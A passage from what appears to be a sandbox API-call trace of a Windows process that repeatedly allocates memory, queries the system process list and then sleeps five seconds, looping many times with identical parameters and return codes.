Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.254] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.260] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.266] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.273] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.279] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.286] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.292] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.299] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.325] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.332] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.339] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.354] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.360] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.366] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.374] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.381] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.388] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.394] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.407] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 